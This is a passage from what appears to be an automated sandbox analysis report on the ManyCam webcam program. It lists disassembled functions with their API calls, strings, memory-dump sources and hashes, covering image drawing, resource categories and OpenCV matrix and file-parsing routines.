], xrefs: 004094FA
Category:, xrefs: 0040948C
Tahoma, xrefs: 0040960B
Select Resource File:, xrefs: 00409464
,, xrefs: 004094E6
k, xrefs: 0040950E
Name:, xrefs: 004094A0
Created by:, xrefs: 004094B4

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$C__@@Draw@Utag$T@@_$Width@$Rect$Height@$ObjectSelectText$BrushClientColorCopyCreateDrawFillSolidU3@_Windowmemset
String ID: ,$Category:$Created by:$Name:$Select Resource File:$Tahoma$Type:$]$k
API String ID: 333958392-4118964679
Opcode ID: 57c0907e371b0e5315c579a3b0ab3a5d9bb1bc661649efe18dc397683e395b28
Instruction ID: c7ad2873c58e454c86f9403bdf801017c004aeaca137986ed775093af6690a25
Opcode Fuzzy Hash: 57c0907e371b0e5315c579a3b0ab3a5d9bb1bc661649efe18dc397683e395b28
Instruction Fuzzy Hash: 1712F970900258DFEB24EB64CC59BEEBB74AF55308F1081E9E10A7B291DB746E88CF55

Function 004DFB90 Relevance: 53.0, APIs: 17, Strings: 13, Instructions: 467memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 004DFBF8
_DebugHeapAllocator.LIBCPMTD ref: 004DFCA8
_DebugHeapAllocator.LIBCPMTD ref: 004DFD09
_DebugHeapAllocator.LIBCPMTD ref: 004DFD20
_DebugHeapAllocator.LIBCPMTD ref: 004DFD4C
??2@YAPAXI@Z.MSVCR80(00000730,Objects,?,00000000,?,00000001,mce;png;gif;bmp;jpg,00000000,00000000,Avatars,Objects,?,Objects,00000000,?,?), ref: 004DFDA6
_DebugHeapAllocator.LIBCPMTD ref: 004DFDDA

Strings

Objects, xrefs: 004DFCD5
Objects, xrefs: 004DFD70
Avatars, xrefs: 004DFCE9
mce;png;gif;bmp;jpg, xrefs: 004DFD38
Face accessories, xrefs: 004E018B
Backgrounds, xrefs: 004DFF99
Face accessories, xrefs: 004E0287
Backgrounds, xrefs: 004DFF49
Objects, xrefs: 004DFCBC
Text over video, xrefs: 004DFED9
Backgrounds, xrefs: 004E0095
Avatars, xrefs: 004DFCFE
Face accessories, xrefs: 004E013B

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$??2@
String ID: Avatars$Avatars$Backgrounds$Backgrounds$Backgrounds$Face accessories$Face accessories$Face accessories$Objects$Objects$Objects$Text over video$mce;png;gif;bmp;jpg
API String ID: 1120120259-206835408
Opcode ID: d03f7ad0f4026a635888b16adfd0c88c78ab99df69ea574cede163314c466ec1
Instruction ID: 863c393ab99b281b1a89dc60ed5188a45fcf53b181839f16f77b3e1b5f5f418e
Opcode Fuzzy Hash: d03f7ad0f4026a635888b16adfd0c88c78ab99df69ea574cede163314c466ec1
Instruction Fuzzy Hash: B5222BB0D023589ADB64DB69CD45BDEBBB5AB49304F0041DEE009B7282DB745F84CF96

Function 0041FEC0 Relevance: 52.8, APIs: 35, Instructions: 281COMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

Part of subcall function 00418B80: CreateSolidBrush.GDI32(744843B1), ref: 00418B8B

FillRect.USER32(00000000,?,00000000), ref: 0041FF4E
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000), ref: 0041FF79
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000), ref: 0041FF88
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041FFA8
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041FFC4
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041FFD5
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041FFE4
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00420003
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00420015
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00420024
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00420033
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 00420054
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00420066
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0042007F
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00420094
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 004200AF
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004200C1
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004200DA
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004200EB
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004200FF
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 0042011A
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0042012C
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0042013B
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0042014E
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 0042016B
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00420187
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00420198
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004201A7
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004201B9
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 004201D6
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004201E8
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004201F7
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00420206
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0042021A
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 00420237

Part of subcall function 00412790: BitBlt.GDI32(FFFFFFFF,?,?,?,?,?,?,?,00CC0020), ref: 00412805

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$Height@Width@$C__@@Draw@T@@_Utag$Rect$BrushClientCreateFillSolid
String ID:
API String ID: 3081667405-0
Opcode ID: e5508424702d3637028a52f75ed04034ea68152d49e61552c755e5592890112e
Instruction ID: 1c2bfeca7ff6b3ab6ad25faf3ba119e10400a5b9e5fd5cc21205db22d06f93b4
Opcode Fuzzy Hash: e5508424702d3637028a52f75ed04034ea68152d49e61552c755e5592890112e
Instruction Fuzzy Hash: 9FB1CF71E00109ABDB08FBD8CCA5BFEB779EF84304F14412DA216B7295DF242959CB65

Function 00BEA8A0 Relevance: 51.0, APIs: 21, Strings: 8, Instructions: 278memoryCOMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,00000000,00000000), ref: 00BEA919
cvGetErrStatus.GLU32 ref: 00BEA923
cvError.GLU32(000000FF,cvMahalanobis,Inner function failed.,.\cxmatmul.cpp,00000AEE), ref: 00BEA942
cvGetMat.GLU32(?,?,00000000,00000000), ref: 00BEA975
cvGetErrStatus.GLU32 ref: 00BEA980
cvGetMat.GLU32(?,?,00000000,00000000), ref: 00BEA9B3
cvGetErrStatus.GLU32 ref: 00BEA9BE
cvError.GLU32(FFFFFF37,cvMahalanobis,Input matrices must be 1-d vectors,.\cxmatmul.cpp,00000AF1), ref: 00BEA9F9
__alloca_probe_16.LIBCMT ref: 00BEAAAE
cvAlloc.GLU32(?), ref: 00BEAAC8
cvGetErrStatus.GLU32 ref: 00BEAAD3
cvSub.GLU32(00000000,?,?,00000000,?,?,?,?,?), ref: 00BEAB15

Part of subcall function 00B9BEE0: cvError.GLU32(FFFFFF30,cvSub,This operation on multi-dimensional arrays does not support mask,.\cxarithm.cpp,00000135), ref: 00B9BFE8

cvGetErrStatus.GLU32 ref: 00BEAB1D

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvError.GLU32(00000000,00000B14), ref: 00BEAB3C
cvFree_.GLU32(?), ref: 00BEAB52
cvErrorFromIppStatus.GLU32(00000000,cvMahalanobis,OpenCV function failed,.\cxmatmul.cpp,00000B14), ref: 00BEABA7
_CIsqrt.MSVCR80 ref: 00BEABB5
cvError.GLU32(FFFFFF2F,cvMahalanobis,Input vectors have different sizes,.\cxmatmul.cpp,00000B02), ref: 00BEABD8
cvError.GLU32(FFFFFF2E,cvMahalanobis,Only single-channel floating-point vectors are supported,.\cxmatmul.cpp,00000AFF), ref: 00BEABFE
cvError.GLU32(FFFFFF2F,cvMahalanobis,Input vectors and covariation matrix have different sizes,.\cxmatmul.cpp,00000AF9), ref: 00BEAC24
cvError.GLU32(FFFFFF2F,cvMahalanobis,Input vectors have different sizes,.\cxmatmul.cpp,00000AF6), ref: 00BEAC4A

Strings

Input vectors and covariation matrix have different sizes, xrefs: 00BEAC15
.\cxmatmul.cpp, xrefs: 00BEA931, 00BEA9E5, 00BEAB2B, 00BEAB97, 00BEABC4, 00BEABEA, 00BEAC10, 00BEAC36
OpenCV function failed, xrefs: 00BEAB9C
Input matrices must be 1-d vectors, xrefs: 00BEA9EA
Only single-channel floating-point vectors are supported, xrefs: 00BEABEF
Input vectors have different sizes, xrefs: 00BEABC9, 00BEAC3B
Inner function failed., xrefs: 00BEA936, 00BEAB30
cvMahalanobis, xrefs: 00BEA93B, 00BEA9EF, 00BEAB35, 00BEABA1, 00BEABCE, 00BEABF4, 00BEAC1A, 00BEAC40

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$AllocFree_FromIsqrt__alloca_probe_16malloc
String ID: .\cxmatmul.cpp$Inner function failed.$Input matrices must be 1-d vectors$Input vectors and covariation matrix have different sizes$Input vectors have different sizes$Only single-channel floating-point vectors are supported$OpenCV function failed$cvMahalanobis
API String ID: 1063862503-3714202847
Opcode ID: a061838633b91d531bf9a519ee52bfa0358c3309146277c72b788e5a5009e4c6
Instruction ID: 1bcfee5d6be363c4c584c25803f9233988beed3fc0af6f1afd45f5e7d4822901
Opcode Fuzzy Hash: a061838633b91d531bf9a519ee52bfa0358c3309146277c72b788e5a5009e4c6
Instruction Fuzzy Hash: 6891D475E00349ABDF10DAA5DC82B6EB3E9EB14714F1101F9E911BB2C2E7B0B9458792

Function 00C26060 Relevance: 49.3, APIs: 19, Strings: 9, Instructions: 269COMMON

Download Yara Rule

APIs

cvGetFileNodeByName.GLU32(?,?,sizes), ref: 00C26087

Part of subcall function 00C22FC0: cvError.GLU32(000000E5,cvGetFileNodeByName,Null element name,.\cxpersistence.cpp,0000023E), ref: 00C2300D

cvGetErrStatus.GLU32 ref: 00C26091

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvGetFileNodeByName.GLU32(?,?,00C5CBB8), ref: 00C260BC
__alloca_probe_16.LIBCMT ref: 00C26129
cvReadRawData.GLU32(?,00000000,?,00C5CBFC), ref: 00C26138
cvGetErrStatus.GLU32 ref: 00C26140
cvError.GLU32(000000FE,icvReadSparseMat,Some of essential matrix attributes are absent,.\cxpersistence.cpp,00000ED4), ref: 00C26399

Part of subcall function 00C25320: cvGetErrStatus.GLU32(?,?,00000000), ref: 00C25340
Part of subcall function 00C25320: cvError.GLU32(00000000,icvDecodeSimpleFormat,Inner function failed.,.\cxpersistence.cpp,00000BD7,?,?,00000000), ref: 00C2535E

cvGetErrStatus.GLU32 ref: 00C2615D
cvGetFileNodeByName.GLU32(?,?,data), ref: 00C2617A
cvCreateSparseMat.GLU32(?,?,00000000), ref: 00C261A0
cvGetErrStatus.GLU32 ref: 00C261AB
__alloca_probe_16.LIBCMT ref: 00C261D1
cvStartReadRawData.GLU32(?,00000000,?), ref: 00C261E7

Part of subcall function 00C253C0: cvStartReadSeq.GLU32(?,?,00000000), ref: 00C2540F
Part of subcall function 00C253C0: cvGetErrStatus.GLU32 ref: 00C25417
Part of subcall function 00C253C0: cvError.GLU32(000000FF,cvStartReadRawData,Inner function failed.,.\cxpersistence.cpp,00000C61), ref: 00C2543A

cvChangeSeqBlock.GLU32(?,00000001), ref: 00C2625D
cvChangeSeqBlock.GLU32(?,00000001), ref: 00C262A7
cvPtrND.GLU32(?,?,00000000,00000001,00000000), ref: 00C262BA
cvGetErrStatus.GLU32 ref: 00C262C4
cvReadRawDataSlice.GLU32(?,?,?,00000000,?), ref: 00C262DE
cvGetErrStatus.GLU32 ref: 00C262E6

Strings

icvReadSparseMat, xrefs: 00C260A9, 00C2631C, 00C26337, 00C26377, 00C26392
Some of essential matrix attributes are absent, xrefs: 00C2638D
Sparse matrix data is corrupted, xrefs: 00C26317, 00C26332
Inner function failed., xrefs: 00C260A4
sizes, xrefs: 00C26079
Could not determine sparse matrix dimensionality, xrefs: 00C26372
.\cxpersistence.cpp, xrefs: 00C2609F, 00C26312, 00C2632D, 00C2635C, 00C2636D, 00C26388
The matrix data is not found in file storage, xrefs: 00C26361
data, xrefs: 00C26173

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Status$ErrorRead$DataFileNameNode$BlockChangeStart__alloca_probe_16$CreateSliceSparsemalloc
String ID: .\cxpersistence.cpp$Could not determine sparse matrix dimensionality$Inner function failed.$Some of essential matrix attributes are absent$Sparse matrix data is corrupted$The matrix data is not found in file storage$data$icvReadSparseMat$sizes
API String ID: 3906617704-2829007588
Opcode ID: 02f4975d16460a2c550dba7c3b156beab283ce9feaccced40ea1cb4ded34e1ec
Instruction ID: 74534cc6038be43e60fdde41b5eb0eb3c21739bebf4e33dc8357423d469ef13e
Opcode Fuzzy Hash: 02f4975d16460a2c550dba7c3b156beab283ce9feaccced40ea1cb4ded34e1ec
Instruction Fuzzy Hash: 28912875E00329AFCF10DB94EC82FAEB3B5EB04710F144565F915BB692D770AD409BA4

Function 00B9A2B0 Relevance: 44.2, APIs: 21, Strings: 4, Instructions: 460COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,?,00000000), ref: 00B9A421
cvGetErrStatus.GLU32 ref: 00B9A42D
cvGetMat.GLU32(?,?,?,00000000), ref: 00B9A450

Part of subcall function 00B9E130: cvError.GLU32(000000E5,cvGetMat,NULL array pointer is passed,.\cxarray.cpp,00000ADB,?,?,?,?), ref: 00B9E4BC

cvGetErrStatus.GLU32 ref: 00B9A45E

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvError.GLU32(000000FF,cvDiv,Inner function failed.,.\cxarithm.cpp,000006B9), ref: 00B9A47D
cvError.GLU32(000000E8,cvDiv,00C4124F,.\cxarithm.cpp,000006BB), ref: 00B9A4AD
cvGetMat.GLU32(?,?,?,00000000), ref: 00B9A4D9
cvGetErrStatus.GLU32 ref: 00B9A4E7
cvError.GLU32(FFFFFF33,cvDiv,00C4124F,.\cxarithm.cpp,000006AB), ref: 00B9A52F
cvInitNArrayIterator.GLU32(-00000002,?,00000000,?,?,00000000), ref: 00B9A5AE
cvGetErrStatus.GLU32 ref: 00B9A5B6
cvError.GLU32(FFFFFF2E,cvDiv,00C4124F,.\cxarithm.cpp,000006CF), ref: 00B9A615

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvNextNArraySlice.GLU32(?), ref: 00B9A65C
cvErrorFromIppStatus.GLU32(00000000,cvDiv,OpenCV function failed,.\cxarithm.cpp,000006E5), ref: 00B9A687
cvError.GLU32(00000000,000006E5), ref: 00B9A690
cvError.GLU32(FFFFFF2E,cvDiv,00C4124F,.\cxarithm.cpp,000006DF), ref: 00B9A6C3
cvError.GLU32(FFFFFF2F,cvDiv,00C4124F,.\cxarithm.cpp,000006F0), ref: 00B9A8CD

Strings

OpenCV function failed, xrefs: 00B9A67C
Inner function failed., xrefs: 00B9A471
.\cxarithm.cpp, xrefs: 00B9A46C, 00B9A49C, 00B9A51B, 00B9A601, 00B9A677, 00B9A6AF, 00B9A738, 00B9A7FB, 00B9A868, 00B9A8B9
cvDiv, xrefs: 00B9A476, 00B9A4A6, 00B9A525, 00B9A60B, 00B9A681, 00B9A6B9, 00B9A742, 00B9A805, 00B9A872, 00B9A8C3

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$Array$FromInitIteratorNextSlicemalloc
String ID: .\cxarithm.cpp$Inner function failed.$OpenCV function failed$cvDiv
API String ID: 2213240858-2317396085
Opcode ID: 88ef991bf398283817ff536903e9ac7589e0c06d733695bffd43f69d61f91752
Instruction ID: 1066af3e3042b93c71903da0fd87ff8ee3723215c8dbf22e9fbe024c1eb10716
Opcode Fuzzy Hash: 88ef991bf398283817ff536903e9ac7589e0c06d733695bffd43f69d61f91752
Instruction Fuzzy Hash: 43F1EEB2604300ABCB20DF59EC82B2AB7E5EBD4714F1446B9F945A7391E7B1D8508BD3

Function 00C2A080 Relevance: 42.3, APIs: 13, Strings: 11, Instructions: 299COMMON

Download Yara Rule

APIs

isalnum.MSVCR80 ref: 00C2A0DA
isalpha.MSVCR80 ref: 00C2A155
isalnum.MSVCR80 ref: 00C2A17A
cvGetHashedKey.GLU32(?,?,?,00000001,?,?,?,?,?,00C2A5DB,?,?,?,?,?,00000000), ref: 00C2A19A
cvGetErrStatus.GLU32(?,?,?,?,?,?,?,?,?,00C2A5DB,?,?,?,?,?,00000000), ref: 00C2A1A8
cvGetErrStatus.GLU32 ref: 00C2A260
cvGetErrStatus.GLU32 ref: 00C2A297

Part of subcall function 00C22D40: sprintf.MSVCR80 ref: 00C22D6E
Part of subcall function 00C22D40: cvError.GLU32(FFFFFF2C,icvYMLSkipSpaces,?,.\cxpersistence.cpp,?), ref: 00C22D88

Strings

Attribute name should be followed by '=', xrefs: 00C2A3BE
Closing tag should not contain any attributes, xrefs: 00C2A3A0
Attribute value should be put into single or double quotes, xrefs: 00C2A3D2
Tag should start with '<', xrefs: 00C2A0B5
Name should start with a letter or underscore, xrefs: 00C2A389
Invalid closing tag for <?xml ..., xrefs: 00C2A34D, 00C2A405
Inner function failed., xrefs: 00C2A3E3
Unknown tag type, xrefs: 00C2A12C
icvXMLParseTag, xrefs: 00C2A0BA, 00C2A131, 00C2A3E8, 00C2A42E
There should be space between attributes, xrefs: 00C2A423
.\cxpersistence.cpp, xrefs: 00C2A0B0, 00C2A127, 00C2A3DE, 00C2A429

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Status$isalnum$ErrorHashedisalphasprintf
String ID: .\cxpersistence.cpp$Attribute name should be followed by '='$Attribute value should be put into single or double quotes$Closing tag should not contain any attributes$Inner function failed.$Invalid closing tag for <?xml ...$Name should start with a letter or underscore$Tag should start with '<'$There should be space between attributes$Unknown tag type$icvXMLParseTag
API String ID: 2689614709-3535608320
Opcode ID: a0966f6b893a938f80ec507a1ef02492270ed49904703bf0e6bc22c5f0df0b89
Instruction ID: 1890c28e999645c0574bfaedabf56ae1aa4eba8148b1b1505fc023d951addb8c
Opcode Fuzzy Hash: a0966f6b893a938f80ec507a1ef02492270ed49904703bf0e6bc22c5f0df0b89
Instruction Fuzzy Hash: 81A169B4948364DBD720DE18FC4572B77D5AB85300F044829F99A9B792E2B5CA89CB83

Function 00C04280 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 314COMMON

Download Yara Rule

APIs

cvGetMat.GLU32 ref: 00C0439C
cvGetErrStatus.GLU32(?,?,?,00000000), ref: 00C043A6
cvError.GLU32(000000FF,cvTranspose,Inner function failed.,.\cxmatrix.cpp,000001D1,?,?,?,00000000), ref: 00C043C5
cvError.GLU32(000000E8,cvTranspose,coi is not supported,.\cxmatrix.cpp,000001D3), ref: 00C043F1

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(FFFFFF2E,cvTranspose,00C4124F,.\cxmatrix.cpp,000001F7), ref: 00C0455E

Strings

In case of inplace column/row transposition both source and destination must be continuous, xrefs: 00C045F5
OpenCV function failed, xrefs: 00C04589
Rectangular matrix can not be transposed inplace, xrefs: 00C045C1
.\cxmatrix.cpp, xrefs: 00C043B4, 00C043E0, 00C0448A, 00C044B7, 00C044EE, 00C0454A, 00C04584, 00C045BC, 00C045F0, 00C04652, 00C04697
Inner function failed., xrefs: 00C043B9, 00C0448F
coi is not supported, xrefs: 00C043E5, 00C044BC
cvTranspose, xrefs: 00C043BE, 00C043EA, 00C04494, 00C044C1, 00C044F8, 00C04554, 00C0458E, 00C045C6, 00C045FA, 00C0465C, 00C046A1

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
